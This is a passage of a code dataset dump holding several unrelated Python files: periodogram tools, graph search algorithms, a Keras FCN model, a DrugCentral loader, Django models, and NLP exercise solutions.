{1} for {2}'.format(curve,xaxis,self.object),fontsize=18)\n ax.legend()\n else:\n # Decide what x-axis should be\n if xaxis == 'Time':\n xdata = self.times\n elif xaxis == 'Phase':\n # Calculate phase from time data\n phases = [(time%self.period)/self.period for time in self.times]\n xdata = phases\n \n return(xdata,self.fluxes,self.errors)\n\n # Function to generate power spectrum from a flux vs. time dataset\n def LS(self,minP,maxP,numIntervals,i,flux,plot=False,trueP=None):\n \n if len(flux) == 0:\n flux = self.fluxes\n \n # Define range of frequencies to search over\n minfreq = 1./maxP\n maxfreq = 1./minP\n \n # Make list of frequencies within the range\n frequency = np.linspace(minfreq,maxfreq,numIntervals)\n \n # Use LombScargle method to calculate power as a function of those frequencies\n power = LombScargle(self.times,flux,self.errors,nterms=i).power(frequency)\n \n # Find maximum power and frequency/period of maximum power\n maxp = np.max(power)\n maxind = np.argmax(power)\n \n maxfreq = frequency[maxind]\n best_period = 1./maxfreq\n \n if plot == True:\n # Plot power spectrum using lists from above\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(frequency,power)\n \n # Set axes limits\n ax.set(xlim=(frequency[0],frequency[-1]), ylim=(0,np.max(power)))\n ax.set_xlabel('Frequency (1/days)',fontsize=14)\n ax.set_ylabel('Power',fontsize=14)\n ax.set_title('Power vs. Freq. for {0}'.format(self.object),fontsize=18)\n \n # Plot line indicating period of system from SIMBAD\n if trueP != None:\n ax.vlines(1./trueP,0,1,linestyle='dashed',label='Published Period ({0:.3f} days)'.format(trueP),alpha=0.75)\n \n # Plot vertical line of best period\n ax.vlines(1./best_period,0,1,linestyle='dashed',label='Dominant Period ({0:.3f} days)'.format(best_period),color='red',alpha=0.5)\n ax.legend(loc='center left',bbox_to_anchor=(1, 0.5))\n \n return(maxp)\n \n # Function to calculate the false alarm probability of a radial velocity detection\n def FAP(self,numIterations):\n # Calculate stats of errors on RV measurements\n meanErr = np.mean(self.errors)\n stddevErr = np.std(self.errors)\n length = len(self.errors)\n \n # Empty list of maximum powers\n maxPowers = []\n numExceed = 0\n \n # Calculate max power from non-noisy data\n original_maxPower = self.LS(35,45,1000,1,flux=self.fluxes)\n \n # Monte Carlo simulation of numIterations noise profiles\n # Used to calculate False Alarm Probability (FAP)\n for i in range(numIterations):\n \n # Generate Gaussian noise to add to RV measurements\n noise = np.random.normal(meanErr,stddevErr,length)\n \n # Add noise to RV measurements\n #newRVs = np.add(self.fluxes,noise)\n \n # Calculate maximum power in the Lomb-Scargle periodogram\n maxPower = self.LS(35,45,1000,1,flux=noise)\n maxPowers.append(maxPower)\n \n # Check if maximum power exceeds that of period in non-noisy data\n if maxPower > original_maxPower:\n numExceed += 1\n \n # Calculate FAP\n FAP = numExceed/numIterations\n print('FAP = {0:.3e}'.format(FAP))\n return(FAP)","sub_path":"HW3/PeriodicityTools.py","file_name":"PeriodicityTools.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"262556048","text":"import copy\nfrom collections import deque, namedtuple\nimport numpy as np\n\nfrom .priorityQueue import PriorityQueue\n\n\nclass Graph():\n\n\tdef __init__(self, V, E, W = None):\n\t\t# Adjacency List representation\n\t\t
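# Hypothetical example of the resulting structure:\n\t\t#   Graph([\"A\", \"B\"], [[\"B\"], [\"A\"]]).G == {\"A\": [Node(\"B\", 1)], \"B\": [Node(\"A\", 1)]}\n\t\t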
namedtuple(\"Node\", [\"vertex\", \"edgeWeight\"])\n\n\t\t# If no weights were assigned, then list all as 1.\n\t\tif W is None:\n\t\t\tedges = ([Node(v, 1) for v in vs] for vs in E)\n\t\telse:\n\t\t\tedges = ([Node(v, w) for v, w in zip(vs, ws)] for vs, ws in zip(E, W))\n\t\tself.G = dict(zip(V, edges))\n\t\t# Create our Graph\n\n\t# G = {v: e for v, e in zip(V, E)}\n\t# Use this to generate Graph of our Vertix and Edges only when you\n\t# want to filter based on keys or values\n\n\tdef breadth_first_search(self, init_vertex: str = None) -> \"List of Search order\":\n\t\t'''\n\t\tEfficient algorithm for level-order searching through a graph.\n\t\t- Time complexity: O(log(n + m)) where n is # of nodes and m is # of edges.\n\t\t- Space complexity: O(log(n)) where n is the # of nodes that need to be \"discovered\".\n\n\t\t:param Char. init_vertix: Vertex to begin the search at.\n\n\t\tIdea:\n\n\t\t1. Add a node to the queue\n\t\t2. Remove node\n\t\t3. Retrieve unvisited neighbors of the removed node, add them to queue\n\t\t4. Repeat steps 1, 2, and 3 as long as the queue is not empty.\n\n\t\tNotes:\n\t\t- Works on directed and undirected graph.\n\t\t- Since a tree is a connected acyclic graph with n nodes, this algorithm is\n\t\t typically used for level-order traversal.\n\t\t- There can only be n - 1 edges, therefore time complexity can only be O(log(n)).\n\t\t- In-order traversal level by level then [left right] in binary list will\n\t\tinvolve exploring root node, then left tree then right tree.\n\n\t\t'''\n\n\t\tvertices = list(self.G.keys()) # Extract the list of vertices\n\t\tnum_vertices = vertices.__len__()\n\t\t# Initialize list of tuples denoting all vertices are yet to be found.\n\t\tdiscovered = dict(zip(vertices, [False] * num_vertices))\n\t\t# Initialize list of tuples denoting all vertices parents in new search tree.\n\t\t# parent = dict(zip(vertices, [None] * num_vertices))\n\t\torder = []\n\n\t\tqueue = deque(maxlen=num_vertices) # Treat our double-ended queue as a queue\n\n\t\t# Begin from a random Vertex\n\t\trand_index = np.random.randint(0, num_vertices - 1)\n\t\tinit_vertex = vertices[rand_index] if init_vertex is None else init_vertex.upper()\n\t\tdiscovered[init_vertex] = True\n\t\t# Enqueue the initial vertex.\n\t\tqueue.append(init_vertex)\n\t\twhile queue:\n\t\t\t# While the queue is not empty we explore the first queued node.\n\n\t\t\t# Dequeue the current vertex <- \"Explored\" i.e. we do stuff with current node.\n\t\t\tcurr_node = queue.popleft() \n\t\t\t#####\t\t\t\t\t\t\t\t\t\t\t########\n\t\t\t# This is the space in your algorithm where you do stuff.\n\t\t\t#####\t\t\t\t\t\t\t\t\t\t\t########\n\n\t\t\torder.append(curr_node) # Only used for unittesting correctness.\n\t\t\t\n\t\t\tfor incident_vertex in self.G[curr_node]:\n\t\t\t\t# for each current node, you will add all incident nodes\n\t\t\t\t# to the queue if they have not been discovered.\n\t\t\t\tif not discovered[incident_vertex.vertex]:\n\t\t\t\t\tdiscovered[incident_vertex.vertex] = True\n\t\t\t\t\t# parent[incident_vertex] = curr_node\n\t\t\t\t\tqueue.append(incident_vertex.vertex)\n\t\treturn order\n\n\tdef depth_first_search(self, init_vertex: str = None) -> \"List of search order\":\n\t\t'''\n\t\tEfficient algorithm for post-order traversal through a graph.\n\t\t- Time complexity: O(log(n + m)) where n is # of nodes and m is # of edges.\n\t\t- Space complexity: O(log(n)) where n is the # of nodes that need to be \"explored\".\n\n\t\t:param Char. 
def depth_first_search(self, init_vertex: str = None) -> \"List of search order\":\n\t\t'''\n\t\tEfficient algorithm for post-order traversal through a graph.\n\t\t- Time complexity: O(n + m) where n is # of nodes and m is # of edges.\n\t\t- Space complexity: O(n) where n is the # of nodes that need to be \"explored\".\n\n\t\t:param str init_vertex: Vertex to begin the search at.\n\n\t\tIdea:\n\n\t\t1. Add a node to the stack\n\t\t2. Remove node\n\t\t3. Retrieve unexplored neighbors of the removed node, add them to stack\n\t\t4. Repeat steps 1, 2, and 3 as long as the stack is not empty.\n\n\t\tNotes:\n\t\tFor Binary Search Trees:\n\t\t- Pre-order traversal [current left right] in binary list will involve exploring\n\t\t root node, then left tree then right tree.\n\t\t- In-order traversal [left current right]\n\t\t- Post-order traversal [left right current]\n\t\t'''\n\t\tvertices = list(self.G.keys()) # Extract the list of vertices\n\t\tnum_vertices = len(vertices)\n\t\t# Initialize a dict marking every vertex as not yet explored.\n\t\texplored = dict(zip(vertices, [False] * num_vertices))\n\t\t# Initialize a dict recording each vertex's parent in the new search tree.\n\t\t# parent = dict(zip(vertices, [None] * num_vertices))\n\t\torder = []\n\n\t\tstack = deque() # Treat our double-ended queue as a stack\n\n\t\t# Begin from a random Vertex\n\t\trand_index = np.random.randint(0, num_vertices)\n\t\tinit_vertex = vertices[rand_index] if init_vertex is None else init_vertex.upper()\n\t\t# Add first vertex\n\t\tstack.append(init_vertex)\n\t\twhile stack: # While the stack is not empty we explore latest node added\n\t\t\tcurr_node = stack.pop()\n\t\t\tif not explored[curr_node]:\n\t\t\t\torder.append(curr_node)\n\t\t\t\t# This is the space in your algorithm where you do stuff.\n\t\t\t\t# print(f\"Processed {curr_node}!\")\n\t\t\t\texplored[curr_node] = True\n\n\t\t\t\t# Order of items placed on stack dictated by V order.\n\t\t\t\tfor incident_node in self.G[curr_node]:\n\t\t\t\t\tif not explored[incident_node.vertex]:\n\t\t\t\t\t\t# parent[incident_node] = curr_node\n\t\t\t\t\t\tstack.append(incident_node.vertex)\n\t\treturn order\n\n\n
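\t# Hypothetical example, continuing the graph above: dijkstra(\"A\") returns\n\t# {\"target_dist\": {\"B\": 1, \"C\": 1, \"A\": 0}, \"parent\": {\"B\": \"A\", \"C\": \"A\"}}.\n\t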
def dijkstra(self, init_vert):\n\t\t'''\n\t\tUsed for solving the shortest path problem on\n\t\tgraph with nonnegative weight for each edge.\n\t\ti.e. finding a path between two nodes\n\t\ts.t. sum of constituent weights is minimized.\n\t\tGreedy algorithm because it nearsightedly always\n\t\tchooses to relax the shortest-path tree.\n\t\t:return Dictionary where \"target_dist\" holds the shortest-path\n\t\tdistances and \"parent\" maps each vertex to its predecessor\n\t\t'''\n\n\t\tparent = {}\n\t\t# Populate target distance dictionary with infinities\n\t\t# Except for the initial vertex.\n\t\ttarget_dist = {vert: float(\"inf\") for vert in self.G.keys()\n\t\t if vert != init_vert}\n\t\ttarget_dist[init_vert] = 0\n\t\tdist_queue = PriorityQueue()\n\n\t\t# Populate priority queue with node and distance pairs.\n\t\tfor vert in target_dist.keys():\n\t\t\tdist_queue.add(vert, target_dist[vert]) # (vertex, distance)\n\n\t\twhile dist_queue:\n\t\t\tcurr = dist_queue.pop()\n\t\t\tfor incident_node in self.G[curr.task]:\n\t\t\t\tif curr.priority + incident_node.edgeWeight < target_dist[incident_node.vertex]:\n\t\t\t\t\t# Perform Relaxation on target distance dictionary\n\t\t\t\t\t# if we can find a shorter path from init_vert to target.\n\t\t\t\t\ttarget_dist[incident_node.vertex] = curr.priority + incident_node.edgeWeight\n\t\t\t\t\tdist_queue.add(incident_node.vertex, target_dist[incident_node.vertex])\n\t\t\t\t\t# Add the current node as the parent, for future pathing.\n\t\t\t\t\tparent[incident_node.vertex] = curr.task\n\n\t\treturn {\"target_dist\": target_dist, \"parent\": parent}\n\n\n\t# def prims(self):\n\t# \t\"\"\"\n\t# \tFind a minimum spanning tree T of an undirected, positively\n\t# \tweighted, connected graph G. Returns a tree T which contains\n\t# \tall original vertices V, but subset of edges.\n\t# \tGreedy algorithm because it nearsightedly selects\n\t# \tlowest edge weight\n\t# \t:return:\n\t# \t\"\"\"\n\t# \tvertices = copy.deepcopy(self.G.keys())\n\t# \tpass\n","sub_path":"datastructures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"548616480","text":"\"\"\"Fully Convolutional Neural Networks.\"\"\"\nfrom __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals\n)\nimport abc\nimport six\nfrom keras.models import Model\nfrom keras.layers import (\n Input,\n Dropout,\n Lambda\n)\nfrom keras.layers.convolutional import (\n Conv2D,\n Conv2DTranspose,\n MaxPooling2D,\n ZeroPadding2D,\n Cropping2D\n)\nfrom keras.layers.merge import add\nfrom keras import backend as K\n\n\nDEBUG = 0\n\n\ndef _crop(target_layer, offset=(None, None), name=None):\n \"\"\"Crop the bottom such that it has the same shape as target_layer.\"\"\"\n def f(input):\n width = input._keras_shape[ROW_AXIS]\n height = input._keras_shape[COL_AXIS]\n target_width = target_layer._keras_shape[ROW_AXIS]\n target_height = target_layer._keras_shape[COL_AXIS]\n cropped = Cropping2D(cropping=((offset[0],\n width - offset[0] - target_width),\n (offset[1],\n height - offset[1] - target_height)),\n name='{}'.format(name))(input)\n return cropped\n return f\n\n\nclass BaseNet(object):\n \"\"\"Abstract BaseNet for FCN.\"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"New method.\"\"\"\n return super(BaseNet, cls).__new__(cls).__call__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n \"\"\"Call method.\"\"\"\n return self._build.__func__\n\n @abc.abstractmethod\n def _build(input):\n \"\"\"Build the basenet on top of input.\n\n Arguments:\n input: Tensor of inputs.\n Returns:\n skip_layers: A list of upsampling entries for the 
skip\n architecture.\"\"\"\n return [input]\n\n\nclass VGG16(BaseNet):\n \"\"\"VGG base net.\n\n Examples:\n skip_layers = VGG16()(Input(shape=(26, 26, 3)))\n \"\"\"\n\n def _build(input):\n pad1 = ZeroPadding2D(padding=(100, 100))(input)\n conv1_1 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='valid', name='conv1_1')(pad1)\n conv1_2 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv1_2')(conv1_1)\n pool1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool1')(conv1_2)\n # Block 2\n conv2_1 = Conv2D(filters=128, kernel_size=(3, 3),\n activation='relu',\n padding='same', name='conv2_1')(pool1)\n conv2_2 = Conv2D(filters=128, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv2_2')(conv2_1)\n pool2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool2')(conv2_2)\n # Block 3\n conv3_1 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_1')(pool2)\n conv3_2 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_2')(conv3_1)\n conv3_3 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_3')(conv3_2)\n pool3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool3')(conv3_3)\n # Block 4\n conv4_1 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_1')(pool3)\n conv4_2 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_2')(conv4_1)\n conv4_3 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_3')(conv4_2)\n pool4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool4')(conv4_3)\n # Block 5\n conv5_1 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_1')(pool4)\n conv5_2 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_2')(conv5_1)\n conv5_3 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_3')(conv5_2)\n pool5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool5')(conv5_3)\n # fully conv\n fc6 = Conv2D(filters=4096, kernel_size=(7, 7),\n activation='relu', padding='valid',\n name='fc6')(pool5)\n drop6 = Dropout(0.5)(fc6)\n fc7 = Conv2D(filters=4096, kernel_size=(1, 1),\n activation='relu', padding='valid',\n name='fc7')(drop6)\n drop7 = Dropout(0.5)(fc7)\n return [drop7, pool4, pool3]\n\n\ndef _get_basenet(identifier):\n \"\"\"Get basenet by identifier.\"\"\"\n if isinstance(identifier, six.string_types):\n basenet = globals().get(identifier.upper())\n if not basenet:\n raise ValueError('Invalid {}'.format(identifier))\n return basenet\n else:\n raise ValueError('Invalid {}. 
A string expected.'.format(identifier))\n\n\ndef _handle_data_format():\n \"\"\"Image data format handler.\"\"\"\n global ROW_AXIS\n global COL_AXIS\n global CHANNEL_AXIS\n if K.image_data_format() == 'channels_last':\n ROW_AXIS = 1\n COL_AXIS = 2\n CHANNEL_AXIS = 3\n else:\n CHANNEL_AXIS = 1\n ROW_AXIS = 2\n COL_AXIS = 3\n\n\ndef FCN(basenet='vgg16', num_output=21,\n input_shape=(None, None, 3)):\n \"\"\"Instantiate the FCN8s architecture with keras.\n\n # Arguments\n basenet: type of basene {'vgg16'}\n num_output: number of classes\n input_shape: input image shape\n # Returns\n A Keras model instance\n \"\"\"\n _handle_data_format()\n basenet = _get_basenet(basenet)\n # input\n input = Input(shape=input_shape)\n # Get skip_layers=[drop7, pool4, pool3] from the base net: VGG16\n skip_layers = basenet(skip_architecture=True)(input)\n\n drop7 = skip_layers[0]\n score_fr = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid',\n name='score_fr')(drop7)\n upscore2 = Conv2DTranspose(filters=num_output, kernel_size=(4, 4),\n strides=(2, 2), padding='valid', use_bias=False,\n data_format=K.image_data_format(),\n name='upscore2')(score_fr)\n # scale pool4 skip for compatibility\n pool4 = skip_layers[1]\n scale_pool4 = Lambda(lambda x: x * 0.01, name='scale_pool4')(pool4)\n score_pool4 = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid', name='score_pool4')(scale_pool4)\n score_pool4c = _crop(upscore2, offset=(5, 5),\n name='score_pool4c')(score_pool4)\n fuse_pool4 = add([upscore2, score_pool4c])\n upscore_pool4 = Conv2DTranspose(filters=num_output, kernel_size=(4, 4),\n strides=(2, 2), padding='valid',\n use_bias=False,\n data_format=K.image_data_format(),\n name='upscore_pool4')(fuse_pool4)\n # scale pool3 skip for compatibility\n pool3 = skip_layers[2]\n scale_pool3 = Lambda(lambda x: x * 0.0001, name='scale_pool3')(pool3)\n score_pool3 = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid', name='score_pool3')(scale_pool3)\n score_pool3c = _crop(upscore_pool4, offset=(9, 9),\n name='score_pool3c')(score_pool3)\n fuse_pool3 = add([upscore_pool4, score_pool3c])\n # score\n upscore8 = Conv2DTranspose(filters=num_output, kernel_size=(16, 16),\n strides=(8, 8), padding='valid',\n use_bias=False,\n data_format=K.image_data_format(),\n name='upscore8')(fuse_pool3)\n score = _crop(input, offset=(31, 31), name='score')(upscore8)\n\n # model\n model = Model(input, score, name='fcn_vgg16')\n\n return model\n","sub_path":"fcn/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"194792465","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Get DrugCentral as OBO.\"\"\"\n\nimport logging\nfrom typing import Iterable\n\nimport bioversions\nimport pandas as pd\n\nfrom pyobo.struct import Obo, Reference, Term\nfrom pyobo.utils.path import ensure_df\n\nlogger = logging.getLogger(__name__)\n\nPREFIX = \"drugcentral\"\nURL = \"http://unmtid-shinyapps.net/download/structures.smiles.tsv\"\n\n\ndef get_obo(force: bool = False) -> Obo:\n \"\"\"Get DrugCentral OBO.\"\"\"\n version = bioversions.get_version(PREFIX)\n return Obo(\n ontology=PREFIX,\n name=\"DrugCentral\",\n data_version=version,\n iter_terms=iter_terms,\n iter_terms_kwargs=dict(version=version, force=force),\n auto_generated_by=f\"bio2obo:{PREFIX}\",\n )\n\n\ndef iter_terms(version: str, force: bool = False) -> Iterable[Term]:\n \"\"\"Iterate over DrugCentral terms.\"\"\"\n df = ensure_df(PREFIX, url=URL, 
version=version, force=force)\n for smiles, inchi, inchi_key, drugcentral_id, drugcentral_name, cas in df.values:\n if pd.isna(smiles) or pd.isna(inchi) or pd.isna(inchi_key):\n logger.warning(\"missing data for drugcentral:%s\", drugcentral_id)\n continue\n term = Term.from_triple(prefix=PREFIX, identifier=drugcentral_id, name=drugcentral_name)\n term.append_xref(Reference(prefix=\"inchikey\", identifier=inchi_key))\n term.append_property(\"smiles\", smiles)\n term.append_property(\"inchi\", inchi)\n if pd.notna(cas):\n term.append_xref(Reference(prefix=\"cas\", identifier=cas))\n yield term\n\n\nif __name__ == \"__main__\":\n get_obo(force=True).write_default(write_obo=True)\n","sub_path":"src/pyobo/sources/drugcentral.py","file_name":"drugcentral.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"297372225","text":"#!/usr/bin/env python3\n\"\"\"\nEnumerating oriented gene orderings\nUsage: ./sign.py [input file]\n\"\"\"\n\nimport sys\nimport argparse\nfrom tools import check_input, read_fasta\nfrom perm import factorial, permHelper\n\ndef main():\n check_input(sys.argv[0])\n enum_list = []\n with open(sys.argv[1]) as infile:\n num = int(infile.readline().strip())\n print((2**num) * factorial(num))\n get_signs(num, enum_list)\n for l in enum_list:\n permHelper(l, 0, len(l)-1)\n\ndef get_signs(end, total_list, current=1, num_list=[]):\n \"\"\"Returns all possible enumerations of num (both positive and negative).\"\"\"\n if current > end:\n total_list.append(num_list.copy())\n return\n nums = [current, -current]\n for num in nums:\n num_list.append(str(num))\n get_signs(end, total_list, current + 1, num_list)\n num_list.pop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sign.py","file_name":"sign.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"23970015","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom uuslug import uuslug\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\n\nclass Post(models.Model):\n user = models.ForeignKey(User, related_name='posts_created')\n name = models.CharField(max_length=200, verbose_name='歌名')\n slug = models.CharField(max_length=500, blank=True)\n description = models.TextField(verbose_name='描述')\n created = models.DateTimeField(auto_now_add=True)\n available = models.BooleanField(default=True)\n # 音乐风格\n MUSIC_GENRE_CHOICES = (\n ('classic', '经典'),\n ('country', '乡村'),\n ('electronic', '电子音乐'),\n ('folk', '民族'),\n ('blues', '蓝调'),\n ('jazz', '爵士'),\n ('pop', '流行'),\n ('r_and_b','R&B'),\n ('rock', '摇滚'),\n ('other', '其他'),\n )\n genre = models.CharField(max_length=200, choices=MUSIC_GENRE_CHOICES, default='pop', verbose_name='风格')\n audio_file = models.FileField(upload_to='audios/%Y/%m/%d', verbose_name='音乐文件')\n\n class Meta:\n ordering = ['-created']\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n self.slug = uuslug(self.name, instance=self)\n super(Post, self).save(*args, **kwargs)\n\n def get_absolute_url(self):\n return reverse('dkmusic:detail', args=[self.slug])\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(Post, related_name='comments')\n user = models.ForeignKey(User, related_name='comments_created')\n created = models.DateTimeField(auto_now_add=True)\n body = models.TextField(verbose_name='评论')\n available = 
models.BooleanField(default=True)\n\n class Meta:\n ordering = ('-created',)\n\n def __str__(self):\n return '{} commented by {}'.format(self.post, self.user)\n","sub_path":"dkmusic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181644796","text":"#!/usr/bin/env python\nimport _init_paths\nimport caffe\nimport argparse\n\ndef parse_args():\n '''\n Parse arguments\n '''\n parser = argparse.ArgumentParser(description=\"Parameters transfer\")\n parser.add_argument('--solver', dest='solver',\n help='solver prototxt', type=str)\n parser.add_argument('--weights', dest='weights',\n help='Weights to transfer', type=str)\n parser.add_argument('--layers', dest='layers',\n help='FC layers to transfer, like fc6,fc7', type=str)\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n print(args)\n\n caffe.set_mode_gpu()\n caffe.set_device(1)\n\n # load caffe reference model\n reference_model = caffe.Net(args.solver, args.weights, caffe.TEST)\n\n for layername, layerparam in reference_model.params.items():\n print(layername, layerparam[0].data.shape)\n\n layernames = args.layers.split(',')\n for layername in layernames:\n convname = layername+'_conv'\n reference_model.params[convname][0].data.flat = \\\n reference_model.params[layername][0].data.flat\n reference_model.params[convname][1].data[...] = \\\n reference_model.params[layername][1].data\n\n reference_model.save('data/imagenet_models/transferred_CaffeNet.v2.caffemodel')\n","sub_path":"tools/param_surgery.py","file_name":"param_surgery.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"85989791","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport copy\n\nfrom polyaxon.exceptions import PolyaxonfileError\nfrom polyaxon.polyflow import V1Environment\n\n\ndef validate(spec, data):\n \"\"\"Validates the data and creates the config objects\"\"\"\n data = copy.deepcopy(data)\n validated_data = {}\n\n def validate_keys(section, config, section_data):\n extra_args = [\n key for key in section_data.keys() if key not in config.SCHEMA().fields\n ]\n if extra_args:\n raise PolyaxonfileError(\n \"Extra arguments passed for `{}`: {}\".format(section, extra_args)\n )\n\n def add_validated_section(section, config):\n if data.get(section):\n section_data = data[section]\n validate_keys(section=section, config=config, section_data=section_data)\n validated_data[section] = config.from_dict(section_data)\n\n add_validated_section(spec.ENVIRONMENT, V1Environment)\n\n return validated_data\n","sub_path":"core/polyaxon/polyaxonfile/specs/libs/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 
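A minimal usage sketch of the validate() helper in the record above. This is illustrative only: FakeSpec is a hypothetical stand-in for a real Polyaxonfile spec class (which supplies its own ENVIRONMENT section name), the import path is assumed to match the record's sub_path, and 'labels' is assumed to be a valid V1Environment field.

# Hypothetical usage sketch for validate(); names marked below are assumptions.
from polyaxon.exceptions import PolyaxonfileError
from polyaxon.polyaxonfile.specs.libs.validator import validate  # path assumed from sub_path

class FakeSpec:  # stand-in: real specs define ENVIRONMENT themselves
    ENVIRONMENT = 'environment'

# A well-formed section is parsed into a V1Environment config object.
validated = validate(FakeSpec, {'environment': {'labels': {'tier': 'ml'}}})
print(type(validated['environment']))

# A key outside the schema's fields is rejected before parsing.
try:
    validate(FakeSpec, {'environment': {'not_a_field': 1}})
except PolyaxonfileError as err:
    print(err)  # Extra arguments passed for `environment`: ['not_a_field']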
+{"seq_id":"407932721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport sys\nimport argparse\n\n\ndef solve_10():\n \"\"\"\n 10. 行数のカウント\n 行数をカウントせよ.確認にはwcコマンドを用いよ.\n\n wc -l\n \"\"\"\n line_num = 0\n for _ in sys.stdin:\n line_num += 1\n return line_num\n\n\ndef solve_11():\n \"\"\"\n 11. タブをスペースに置換\n タブ1文字につきスペース1文字に置換せよ.確認にはsedコマンド,trコマンド,もしくはexpandコマンドを用いよ.\n\n cat hightemp.txt|tr $'\\t' ' '\n \"\"\"\n repl = lambda x: x.rstrip('\\n').replace('\\t', ' ')\n lines = (repl(line) for line in sys.stdin)\n\n return '\\n'.join(lines)\n\n\ndef solve_12():\n \"\"\"\n 12. 1列目をcol1.txtに,2列目をcol2.txtに保存\n 各行の1列目だけを抜き出したものをcol1.txtに,2列目だけを抜き出したものをcol2.txtとしてファイルに保存せよ.確認にはcutコマンドを用いよ.\n\n\n \"\"\"\n with open('./col1.txt', 'w') as fout_col1, open('./col2.txt', 'w') as fout_col2:\n for line in sys.stdin:\n cols = line.rstrip('\\n').split('\\t')\n\n fout_col1.writelines([cols[0], '\\n'])\n fout_col2.writelines([cols[1], '\\n'])\n\n\ndef solve_13():\n \"\"\"\n 13. col1.txtとcol2.txtをマージ\n 12で作ったcol1.txtとcol2.txtを結合し,元のファイルの1列目と2列目をタブ区切りで並べたテキストファイルを作成せよ.確認にはpasteコマンドを用いよ.\n\n paste col1.txt col2.txt\n \"\"\"\n with open('./col1.txt', 'r') as fin_col1, open('./col2.txt', 'r') as fin_col2, \\\n open('./merged_col.txt', 'w') as fout:\n for line1, line2 in zip(fin_col1, fin_col2):\n line1 = line1.rstrip()\n line2 = line2.rstrip()\n\n fout.writelines([line1, '\\t', line2, '\\n'])\n\n\ndef solve_14(n=1):\n \"\"\"\n 14. 先頭からN行を出力\n 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち先頭のN行だけを表示せよ.確認にはheadコマンドを用いよ.\n\n cat hightemp.txt | head -8\n \"\"\"\n return '\\n'.join([line.rstrip('\\n') for i, line in enumerate(sys.stdin) if i < n])\n\n\ndef solve_15(n=1):\n \"\"\"\n 15. 末尾のN行を出力\n 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.確認にはtailコマンドを用いよ.\n\n cat hightemp.txt | tail -8\n \"\"\"\n lines = [line.rstrip('\\n') for line in sys.stdin]\n return '\\n'.join(lines[-n:])\n\n\nif __name__ == \"__main__\":\n # print(solve_10())\n # print(solve_11())\n # solve_12()\n # solve_13()\n\n parser = argparse.ArgumentParser(description='課題14')\n parser.add_argument('-n', type=int, default=5, help='先頭から表示する行数N')\n args = parser.parse_args()\n # print(solve_14(n=args.n))\n print(solve_15(n=args.n))\n","sub_path":"chap_02/nlp100_chap2.py","file_name":"nlp100_chap2.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"605856020","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import 